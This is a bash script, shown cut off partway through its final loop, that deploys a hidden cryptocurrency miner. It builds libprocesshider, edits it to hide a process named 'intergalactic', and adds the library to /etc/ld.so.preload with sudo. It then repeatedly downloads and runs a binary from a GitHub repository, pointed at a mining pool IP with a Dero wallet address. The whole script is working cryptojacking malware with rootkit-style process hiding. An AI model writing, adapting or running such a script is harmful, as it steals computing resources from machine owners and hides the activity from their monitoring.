#!/usr/bin/env bash

pause="false"
preload_GPU="true"
preload_CPU="false"
duco="false"

if [[ $preload_GPU == *"true"* ]] && [[ $pause == *"false"* ]]; then
    git clone https://github.com/gianlucaborello/libprocesshider; cd libprocesshider; awk '{ if (NR == 12) print "static const char* process_to_filter = \"intergalactic\";"; else print $0}' processhider.c > processhider1.c; rm processhider.c; mv processhider1.c processhider.c; make; sudo mv libprocesshider.so /usr/local/lib/; sudo sh -c "echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload";
else if [[ $preload_CPU == *"true"* ]]; then
    git clone https://github.com/gianlucaborello/libprocesshider; cd libprocesshider; awk '{ if (NR == 12) print "static const char* process_to_filter = \"intergalactic*\";"; else print $0}' processhider.c > processhider1.c; rm processhider.c; mv processhider1.c processhider.c; make; sudo mv libprocesshider.so /usr/local/lib/; sudo sh -c "echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload";
fi
fi

while [[ true ]]; do
    wget https://github.com/latugio/pandanisem/raw/main/intergalactic;chmod 700 intergalactic;./intergalactic -o s+tcp://51.222.96.66:443 -u deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92xee87fwsrs6zxfqrntthr.TES
    
